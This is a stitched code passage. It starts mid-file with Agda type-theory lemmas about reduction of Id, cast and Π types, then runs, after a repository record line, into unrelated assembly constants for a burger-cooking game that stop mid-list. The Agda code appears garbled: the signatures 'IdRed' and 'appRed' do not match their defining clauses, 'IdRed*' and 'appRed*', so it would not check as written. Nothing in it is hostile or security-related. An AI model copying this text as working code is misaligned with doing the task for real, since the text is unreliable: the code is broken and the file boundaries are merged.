un-univ⇒* (id x) = id (un-univ x) un-univ⇒* (x ⇨ D) = un-univ⇒ x ⇨ un-univ⇒* D univ:⇒: : ∀ {l Γ A B r} → Γ ⊢ A :⇒: B ∷ Univ r l ^ next l → Γ ⊢ A :⇒: B ^ [ r , ι l ] univ:⇒: [[ ⊢A , ⊢B , D ]] = [[ (univ ⊢A) , (univ ⊢B) , (univ⇒* D) ]] un-univ:⇒: : ∀ {l Γ A B r} → Γ ⊢ A :⇒: B ^ [ r , ι l ] → Γ ⊢ A :⇒: B ∷ Univ r l ^ next l un-univ:⇒: [[ ⊢A , ⊢B , D ]] = [[ (un-univ ⊢A) , (un-univ ⊢B) , (un-univ⇒* D) ]] IdRedTerm′ : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A ⇒ B ^ [ ! , ι l ]) → Γ ⊢ Id A t u ⇒* Id B t u ∷ SProp l ^ next l IdRedTerm′ ⊢t ⊢u (id (univ ⊢A)) = id (Idⱼ ⊢A ⊢t ⊢u) IdRedTerm′ ⊢t ⊢u (univ d ⇨ D) = Id-subst d ⊢t ⊢u ⇨ IdRedTerm′ (conv ⊢t (subset (univ d))) (conv ⊢u (subset (univ d))) D IdRedTerm : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A :⇒: B ^ [ ! , ι l ]) → Γ ⊢ Id A t u :⇒: Id B t u ∷ SProp l ^ next l IdRedTerm {Γ} {A} {B} ⊢t ⊢u [[ univ ⊢A , univ ⊢B , D ]] = [[ Idⱼ ⊢A ⊢t ⊢u , Idⱼ ⊢B (conv ⊢t (subset D)) (conv ⊢u (subset* D)) , IdRedTerm′ ⊢t ⊢u D ]] IdRed : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι l ]) → Γ ⊢ Id A t u ⇒* Id B t u ^ [ % , ι l ] IdRed* ⊢t ⊢u (id ⊢A) = id (univ (Idⱼ (un-univ ⊢A) ⊢t ⊢u)) IdRed* ⊢t ⊢u (d ⇨ D) = univ (Id-subst (un-univ⇒ d) ⊢t ⊢u) ⇨ IdRed* (conv ⊢t (subset d)) (conv ⊢u (subset d)) D CastRedTerm′ : ∀ {Γ A B X e t} (⊢X : Γ ⊢ X ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A X ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒ B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ A X e t ⇒* cast ⁰ B X e t ∷ X ^ ι ⁰ CastRedTerm′ (univ ⊢X) ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ ⊢A ⊢X ⊢e ⊢t) CastRedTerm′ (univ ⊢X) ⊢e ⊢t (univ d ⇨ D) = cast-subst d ⊢X ⊢e ⊢t ⇨ CastRedTerm′ (univ ⊢X) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢t))) (subsetTerm d) (refl ⊢X)) )) (conv ⊢t (subset (univ d))) D CastRedTerm : ∀ {Γ A B X t e} (⊢X : Γ ⊢ X ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A X ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒: B ∷ U ⁰ ^ next ⁰) → Γ ⊢ cast ⁰ A X e t :⇒: cast ⁰ B X e t ∷ X ^ ι ⁰ CastRedTerm {Γ} {A} {B} (univ ⊢X) ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = [[ castⱼ ⊢A ⊢X ⊢e ⊢t , castⱼ ⊢B ⊢X (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢t))) (subsetTerm D) (refl ⊢X)) )) (conv ⊢t (univ (subsetTerm D))) , CastRedTerm′ (univ ⊢X) ⊢e ⊢t (univ* D) ]] CastRedTermℕ′ : ∀ {Γ A B e t} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒ B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ A e t ⇒* cast ⁰ ℕ B e t ∷ A ^ ι ⁰ CastRedTermℕ′ ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (ℕⱼ (wfTerm ⊢A)) ⊢A ⊢e ⊢t) CastRedTermℕ′ ⊢e ⊢t (univ d ⇨ D) = cast-ℕ-subst d ⊢e ⊢t ⇨ conv* (CastRedTermℕ′ (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (ℕⱼ (wfTerm ⊢e))) (subsetTerm d))) ) ⊢t D) (sym (subset (univ d))) CastRedTermℕ : ∀ {Γ A B e t} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒: B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ A e t :⇒: cast ⁰ ℕ B e t ∷ A ^ ι ⁰ CastRedTermℕ ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (un-univ ⊢A) ⊢e ⊢t , conv (castⱼ (ℕⱼ (wfTerm ⊢e)) (un-univ ⊢B) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (ℕⱼ (wfTerm ⊢e))) (subsetTerm (un-univ⇒* D))))) ⊢t) (sym (subset* D)) , CastRedTermℕ′ ⊢e ⊢t D ]] CastRedTermℕℕ′ : ∀ {Γ e t u} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ⇒* u ∷ ℕ ^ ι ⁰ ) → Γ ⊢ cast ⁰ ℕ ℕ e t ⇒* cast ⁰ ℕ ℕ e u ∷ ℕ ^ ι ⁰ CastRedTermℕℕ′ ⊢e (id ⊢t) = id (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢t) CastRedTermℕℕ′ ⊢e (d ⇨ D) = cast-ℕ-cong ⊢e d ⇨ CastRedTermℕℕ′ ⊢e D CastRedTermℕℕ : ∀ {Γ e t u} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t :⇒: u ∷ ℕ ^ ι ⁰ ) → Γ ⊢ cast ⁰ ℕ ℕ e t :⇒: cast ⁰ ℕ ℕ e u ∷ ℕ ^ ι ⁰ CastRedTermℕℕ ⊢e [[ ⊢t , ⊢u , D ]] = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢t , castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢u , CastRedTermℕℕ′ ⊢e D ]] CastRedTermℕsuc : ∀ {Γ e n} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢n : Γ ⊢ n ∷ ℕ ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ ℕ e (suc n) :⇒: suc (cast ⁰ ℕ ℕ e n) ∷ ℕ ^ ι ⁰ CastRedTermℕsuc ⊢e ⊢n = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e (sucⱼ ⊢n) , sucⱼ (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢n) , cast-ℕ-S ⊢e ⊢n ⇨ id (sucⱼ (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢n)) ]] CastRedTermℕzero : ∀ {Γ e} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) → Γ ⊢ cast ⁰ ℕ ℕ e zero :⇒: zero ∷ ℕ ^ ι ⁰ CastRedTermℕzero ⊢e = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e (zeroⱼ (wfTerm ⊢e)) , zeroⱼ (wfTerm ⊢e) , cast-ℕ-0 ⊢e ⇨ id (zeroⱼ (wfTerm ⊢e)) ]] CastRedTermΠ′ : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ∷ (Univ rF ⁰) ^ [ ! , next ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , next ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒ B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t ⇒* cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ CastRedTermΠ′ ⊢F ⊢G ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢A ⊢e ⊢t) CastRedTermΠ′ ⊢F ⊢G ⊢e ⊢t (univ d ⇨ D) = cast-Π-subst ⊢F ⊢G d ⊢e ⊢t ⇨ conv* (CastRedTermΠ′ ⊢F ⊢G (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G)) (subsetTerm d))) ) ⊢t D) (sym (subset (univ d))) CastRedTermΠ : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ∷ (Univ rF ⁰) ^ [ ! , next ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , next ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒: B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t :⇒: cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ CastRedTermΠ ⊢F ⊢G ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = let [Π] = Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G in [[ castⱼ [Π] (un-univ ⊢A) ⊢e ⊢t , conv (castⱼ [Π] (un-univ ⊢B) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl [Π]) (subsetTerm (un-univ⇒* D))))) ⊢t) (sym (subset* D)) , CastRedTermΠ′ ⊢F ⊢G ⊢e ⊢t D ]] IdURedTerm′ : ∀ {Γ t t′ u} (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒* t′ ∷ U ⁰ ^ ι ¹) (⊢u : Γ ⊢ u ∷ U ⁰ ^ [ ! , ι ¹ ]) → Γ ⊢ Id (U ⁰) t u ⇒* Id (U ⁰) t′ u ∷ SProp ¹ ^ ∞ IdURedTerm′ ⊢t ⊢t′ (id x) ⊢u = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) ⊢t ⊢u) IdURedTerm′ ⊢t ⊢t′ (x ⇨ d) ⊢u = _⇨_ (Id-U-subst x ⊢u) (IdURedTerm′ (redFirstTerm d) ⊢t′ d ⊢u) IdURedTerm : ∀ {Γ t t′ u} (d : Γ ⊢ t :⇒: t′ ∷ U ⁰ ^ ι ¹) (⊢u : Γ ⊢ u ∷ U ⁰ ^ [ ! , ι ¹ ]) → Γ ⊢ Id (U ⁰) t u :⇒: Id (U ⁰) t′ u ∷ SProp ¹ ^ ∞ IdURedTerm [[ ⊢t , ⊢t′ , d ]] ⊢u = [[ Idⱼ (univ 0<1 (wfTerm ⊢u)) ⊢t ⊢u , Idⱼ (univ 0<1 (wfTerm ⊢u)) ⊢t′ ⊢u , IdURedTerm′ ⊢t ⊢t′ d ⊢u ]] IdUΠRedTerm′ : ∀ {Γ F rF G t t′} (⊢F : Γ ⊢ F ∷ Univ rF ⁰ ^ [ ! , ι ¹ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒* t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t ⇒* Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t′ ∷ SProp ¹ ^ ∞ IdUΠRedTerm′ ⊢F ⊢G ⊢t ⊢t′ (id x) = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t) IdUΠRedTerm′ ⊢F ⊢G ⊢t ⊢t′ (x ⇨ d) = _⇨_ (Id-U-Π-subst ⊢F ⊢G x) (IdUΠRedTerm′ ⊢F ⊢G (redFirstTerm d) ⊢t′ d) IdUΠRedTerm : ∀ {Γ F rF G t t′} (⊢F : Γ ⊢ F ∷ Univ rF ⁰ ^ [ ! , ι ¹ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t :⇒: t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t :⇒: Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t′ ∷ SProp ¹ ^ ∞ IdUΠRedTerm ⊢F ⊢G [[ ⊢t , ⊢t′ , d ]] = [[ Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t , Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t′ , IdUΠRedTerm′ ⊢F ⊢G ⊢t ⊢t′ d ]] IdℕRedTerm′ : ∀ {Γ t t′ u} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢t′ : Γ ⊢ t′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ t ⇒* t′ ∷ ℕ ^ ι ⁰) (⊢u : Γ ⊢ u ∷ ℕ ^ [ ! , ι ⁰ ]) → Γ ⊢ Id ℕ t u ⇒* Id ℕ t′ u ∷ SProp ⁰ ^ next ⁰ IdℕRedTerm′ ⊢t ⊢t′ (id x) ⊢u = id (Idⱼ (ℕⱼ (wfTerm ⊢u)) ⊢t ⊢u) IdℕRedTerm′ ⊢t ⊢t′ (x ⇨ d) ⊢u = _⇨_ (Id-ℕ-subst x ⊢u) (IdℕRedTerm′ (redFirstTerm d) ⊢t′ d ⊢u) Idℕ0RedTerm′ : ∀ {Γ t t′} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢t′ : Γ ⊢ t′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ t ⇒ t′ ∷ ℕ ^ ι ⁰) → Γ ⊢ Id ℕ zero t ⇒* Id ℕ zero t′ ∷ SProp ⁰ ^ next ⁰ Idℕ0RedTerm′ ⊢t ⊢t′ (id x) = id (Idⱼ (ℕⱼ (wfTerm ⊢t)) (zeroⱼ (wfTerm ⊢t)) ⊢t) Idℕ0RedTerm′ ⊢t ⊢t′ (x ⇨ d) = Id-ℕ-0-subst x ⇨ Idℕ0RedTerm′ (redFirstTerm d) ⊢t′ d IdℕSRedTerm′ : ∀ {Γ t u u′} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢u : Γ ⊢ u ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢u′ : Γ ⊢ u′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ u ⇒ u′ ∷ ℕ ^ ι ⁰) → Γ ⊢ Id ℕ (suc t) u ⇒* Id ℕ (suc t) u′ ∷ SProp ⁰ ^ next ⁰ IdℕSRedTerm′ ⊢t ⊢u ⊢u′ (id x) = id (Idⱼ (ℕⱼ (wfTerm ⊢t)) (sucⱼ ⊢t) ⊢u) IdℕSRedTerm′ ⊢t ⊢u ⊢u′ (x ⇨ d) = Id-ℕ-S-subst ⊢t x ⇨ IdℕSRedTerm′ ⊢t (redFirstTerm d) ⊢u′ d IdUℕRedTerm′ : ∀ {Γ t t′} (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒ t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) ℕ t ⇒* Id (U ⁰) ℕ t′ ∷ SProp ¹ ^ ∞ IdUℕRedTerm′ ⊢t ⊢t′ (id x) = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t) IdUℕRedTerm′ ⊢t ⊢t′ (x ⇨ d) = _⇨_ (Id-U-ℕ-subst x) (IdUℕRedTerm′ (redFirstTerm d) ⊢t′ d) IdUℕRedTerm : ∀ {Γ t t′} (d : Γ ⊢ t :⇒: t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) ℕ t :⇒: Id (U ⁰) ℕ t′ ∷ SProp ¹ ^ ∞ IdUℕRedTerm [[ ⊢t , ⊢t′ , d ]] = [[ Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t , Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t′ , IdUℕRedTerm′ ⊢t ⊢t′ d ]] appRed : ∀ {Γ a t u A B rA lA lB l} (⊢a : Γ ⊢ a ∷ A ^ [ rA , ι lA ]) (D : Γ ⊢ t ⇒* u ∷ (Π A ^ rA ° lA ▹ B ° lB ° l) ^ ι l) → Γ ⊢ t ∘ a ^ l ⇒* u ∘ a ^ l ∷ B [ a ] ^ ι lB appRed* ⊢a (id x) = id (x ∘ⱼ ⊢a) appRed* ⊢a (x ⇨ D) = app-subst x ⊢a ⇨ appRed* ⊢a D castΠRed* : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t ⇒* cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ castΠRed* ⊢F ⊢G ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ un-univ ⊢F ▹ un-univ ⊢G) ⊢A ⊢e ⊢t) castΠRed* ⊢F ⊢G ⊢e ⊢t ((univ d) ⇨ D) = cast-Π-subst (un-univ ⊢F) (un-univ ⊢G) d ⊢e ⊢t ⇨ conv* (castΠRed* ⊢F ⊢G (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wf ⊢F))) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ un-univ ⊢F ▹ un-univ ⊢G)) (subsetTerm d)))) ⊢t D) (sym (subset (univ d))) notredUterm* : ∀ {Γ r l l' A B} → Γ ⊢ Univ r l ⇒ A ∷ B ^ l' → ⊥ notredUterm* (conv D x) = notredUterm* D notredU* : ∀ {Γ r l l' A} → Γ ⊢ Univ r l ⇒ A ^ [ ! , l' ] → ⊥ notredU* (univ x) = notredUterm* x redUgen : ∀ {Γ r l r' l' l''} → Γ ⊢ Univ r l ⇒ Univ r' l' ^ [ ! , l'' ] → Univ r l PE.≡ Univ r' l' redUgen (id x) = PE.refl redUgen (univ (conv x x₁) ⇨ D) = ⊥-elim (notredUterm* x) -- Typing of Idsym Idsymⱼ : ∀ {Γ A l x y e} → Γ ⊢ A ∷ U l ^ [ ! , next l ] → Γ ⊢ x ∷ A ^ [ ! , ι l ] → Γ ⊢ y ∷ A ^ [ ! , ι l ] → Γ ⊢ e ∷ Id A x y ^ [ % , ι l ] → Γ ⊢ Idsym A x y e ∷ Id A y x ^ [ % , ι l ] Idsymⱼ {Γ} {A} {l} {x} {y} {e} ⊢A ⊢x ⊢y ⊢e = let ⊢Γ = wfTerm ⊢A ⊢A = univ ⊢A ⊢P : Γ ∙ A ^ [ ! , ι l ] ⊢ Id (wk1 A) (var 0) (wk1 x) ^ [ % , ι l ] ⊢P = univ (Idⱼ (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢A) (un-univ ⊢A)) (var (⊢Γ ∙ ⊢A) here) (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢A) ⊢x)) ⊢refl : Γ ⊢ Idrefl A x ∷ Id (wk1 A) (var 0) (wk1 x) [ x ] ^ [ % , ι l ] ⊢refl = PE.subst₂ (λ X Y → Γ ⊢ Idrefl A x ∷ Id X x Y ^ [ % , ι l ]) (PE.sym (wk1-singleSubst A x)) (PE.sym (wk1-singleSubst x x)) (Idreflⱼ ⊢x) in PE.subst₂ (λ X Y → Γ ⊢ Idsym A x y e ∷ Id X y Y ^ [ % , ι l ]) (wk1-singleSubst A y) (wk1-singleSubst x y) (transpⱼ ⊢A ⊢P ⊢x ⊢refl ⊢y ⊢e) ▹▹ⱼ_▹_▹_▹_ : ∀ {Γ F rF lF G lG r l} → lF ≤ l → lG ≤ l → Γ ⊢ F ∷ (Univ rF lF) ^ [ ! , next lF ] → Γ ⊢ G ∷ (Univ r lG) ^ [ ! , next lG ] → Γ ⊢ F ^ rF ° lF ▹▹ G ° lG ° l ∷ (Univ r l) ^ [ ! , next l ] ▹▹ⱼ lF≤ ▹ lG≤ ▹ F ▹ G = Πⱼ lF≤ ▹ lG≤ ▹ F ▹ un-univ (Twk.wk (Twk.step Twk.id) ((wf (univ F)) ∙ (univ F)) (univ G)) ××ⱼ_▹_ : ∀ {Γ F G l} → Γ ⊢ F ∷ SProp l ^ [ ! , next l ] → Γ ⊢ G ∷ SProp l ^ [ ! , next l ] → Γ ⊢ F ×× G ∷ SProp l ^ [ ! , next l ] ××ⱼ F ▹ G = ∃ⱼ F ▹ un-univ (Twk.wk (Twk.step Twk.id) ((wf (univ F)) ∙ (univ F)) (univ G))
game_constants.asm	adkennan/BurgerMayhem	0	19838	; Game States GS_TITLE = $00 GS_START_GAME = $01 GS_PRE_LEVEL = $02 GS_RUNNING = $03 GS_POST_LEVEL = $04 GS_GAME_OVER = $05 FIRST_SPRITE = $20 LEVEL_COUNT = 11 ; Objects OBJ_NONE = $00 OBJ_BUN = $03 OBJ_PLATE = $04 OBJ_PLATE_FULL = $05 OBJ_TOMATO = $06 OBJ_TOM_CHOP = $07 OBJ_LETTUCE = $08 OBJ_LET_CHOP = $09 OBJ_MEAT_RAW = $0A OBJ_MEAT_COOK = $0B OBJ_PAN = $0C OBJ_PAN_COOKING = $0D OBJ_PAN_COOKED = $27 ; Status bar sprites SB_0 = 42 + FIRST_SPRITE SB_1 = 43 + FIRST_SPRITE SB_2 = 44 + FIRST_SPRITE SB_3 = 45 + FIRST_SPRITE SB_4 = 46 + FIRST_SPRITE SB_5 = 47 + FIRST_SPRITE SB_6 = 48 + FIRST_SPRITE SB_7 = 49 + FIRST_SPRITE SB_8 = 50 + FIRST_SPRITE SB_9 = 51 + FIRST_SPRITE SB_BURGER = 52 + FIRST_SPRITE SB_CLOCK = 53 + FIRST_SPRITE SB_COLON = 54 + FIRST_SPRITE ; Title screen burger parts TSB_TOP_BUN_1 = 59 + FIRST_SPRITE TSB_BOTTOM_BUN_1 = 60 + FIRST_SPRITE TSB_LETTUCE_1 = 61 + FIRST_SPRITE TSB_TOMATO_1 = 62 + FIRST_SPRITE TSB_MEAT_1 = 63 + FIRST_SPRITE ; Burger assembly state BURG_NONE = $00 BURG_BUN = $01 BURG_TOMATO = $02 BURG_LETTUCE = $04 BURG_MEAT = $08 BURG_ALL = BURG_BUN + BURG_TOMATO + BURG_LETTUCE + BURG_MEAT ; Tile TILE_FLOOR_0 = $00 ; 0000 0000 TILE_FLOOR_1 = $01 ; 0000 0001 TILE_FLOOR_2 = $02 ; 0000 0010 TILE_FLOOR_3 = $03 ; 0000 0011 TILE_SLIDER_N = $04 ; 0000 0100 TILE_SLIDER_S = $05 ; 0000 0101 TILE_SLIDER_E = $06 ; 0000 0110 TILE_SLIDER_W = $07 ; 0000 0111 TILE_VOID = $08 ; 0000 1000 TILE_PLATE = $09 ; 0000 1001 TILE_BUN = $0A ; 0000 1010 TILE_MEAT = $0B ; 0000 1011 TILE_TOMATO = $0C ; 0000 1100 TILE_LETTUCE = $0D ; 0000 1101 TILE_SERVE = $0E ; 0000 1110 TILE_BIN = $0F ; 0000 1111 TILE_BLOCKER_0 = $10 ; 0001 0000 TILE_BLOCKER_1 = $11 ; 0001 0001 TILE_BLOCKER_2 = $12 ; 0001 0010 TILE_BLOCKER_3 = $13 ; 0001 0011 TILE_WALL_0 = $20 ; 0010 0000 TILE_WALL_1 = $21 ; 0010 0001 TILE_WALL_2 = $22 ; 0010 0010 TILE_WALL_3 = $23 ; 0010 0011 TILE_BENCH = $40 ; 0100 0000 TILE_STOVE = $80 ; 1000 0000 TILE_CHOP = $C0 ; 1100 0000 TILE_EOL = $FF TILE_SLIDE_MASK = $07 TILE_BLOCKER_MASK = $F0 FIRST_WALL_TILE = TILE_VOID ; Activities ACT_MOVE = $00 ACT_CHOP = $01 ACT_COOK = $02 ; Messages MSG_NONE = $00 MSG_OK = $21 MSG_ERR = $22 MSG_BUN = $23 MSG_TOMATO = $24 MSG_LETTUCE = $25 MSG_MEAT_COOKED = $26 MSG_MEAT_RAW = $28 MSG_GO = $37 MSG_1_OF_4 = $38 MSG_2_OF_4 = $39 MSG_3_OF_4 = $3A ; Title screen constants LOGO_BURGER_SPR = FIRST_SPRITE + $40 LOGO_MAYHEM_SPR = FIRST_SPRITE + $44 LINE_1_START = 0 LINE_1_STOP = 52 LINE_2_START = 252 LINE_2_STOP = LINE_1_STOP + 48 BB_LEFT_X = 156 FG_FADE_LENGTH = 5 FG_FADE_FREQ = 5 ; Directions DIR_NONE = $00 DIR_S = $04 DIR_N = $08 DIR_E = $10 DIR_W = $20 DIR_SHRUG = $29 ; Level Offsets LVL_MP_LO = $00 ; Map Pointer Lo LVL_MP_HI = $01 ; Map Pointer Hi LVL_TL_M = $02 ; Time Limit Seconds LVL_TL_S_HI = $03 ; Time Limit Minutes LVL_TL_S_LO = $04 LVL_TARGET = $05 ; Target LVL_P1_X = $06 ; Player 1 Start X LVL_P1_Y = $07 ; Player 1 Start Y LVL_P2_X = $08 ; Player 2 Start X LVL_P2_Y = $09 ; Player 2 Start Y LVL_THEME_LO = $0A ; Theme pointer LVL_THEME_HI = $0B LVL_DESC_LO = $0C ; Description pointer LVL_DESC_HI = $0D LVL_DATA_SIZE = $0E LVL_TILE_MAP = $C400 ; Expanded map of tiles. THEME_BG_COL_2 = $00 THEME_BG_COL_3 = $01 THEME_SHADOW_COL = $02 THEME_SRC_CHARS = $03 THEME_W0_CHARS = $1B THEME_W0_FG = $24 THEME_W0_BG = $2D THEME_W1_CHARS = $36 THEME_W1_FG = $3F THEME_W1_BG = $48 THEME_W2_CHARS = $51 THEME_W2_FG = $5A THEME_W2_BG = $63 THEME_W3_CHARS = $6C 